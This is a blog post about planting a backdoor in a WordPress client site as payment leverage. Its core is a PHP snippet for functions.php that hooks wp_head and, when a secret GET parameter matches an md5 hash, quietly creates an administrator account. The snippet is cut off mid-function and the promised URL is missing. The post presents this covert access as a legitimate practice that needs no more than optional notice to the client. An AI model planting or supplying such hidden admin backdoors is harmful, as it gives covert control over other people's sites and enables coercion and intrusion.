Installing backdoor in a WordPress site

It usually sounds not good to having a backdoor not only in WP site but in any site. But it’s not always for the bad purpose. Sometimes, you wanna have backdoor in your client site so the you feel secure about the payment that you have to receive from your client and you are working on client’s server. It’s alternative way is that you start work on your own server and after the client approve the work, you just transfer the site to client’s server. But if client’s insist to work on their server, then you can even notify the client that you are having access to client’s site that you will remove after you got the payment. So, it’s a form of legal use of backdoor in a WordPress site.

So, for this purpose, I googled a lot of methods. But the one that I found the best was from wpcrafter. Worked great for me.

You need to put the below piece of code in your Functions.php file

add_action( 'wp_head', 'my_testing_backdoor' );

function my_testing_backdoor() {
    if ( md5( $_GET['username-here'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'username-here' ) ) {
            $user_id = wp_create_user( 'username-here', 'pass' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 

After that, you can open a new tab and put this url over there;

So that’s it. Now a new user has been created in users. you can now access the site with your username and pass you set.

Share it in your network:

1 thought on “Installing backdoor in a WordPress site”

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.



You have successfully subscribed to my email list. Now you will be recieving latest wordpress tips and tricks directly in your mail box.

Don’t worry! I won’t spam you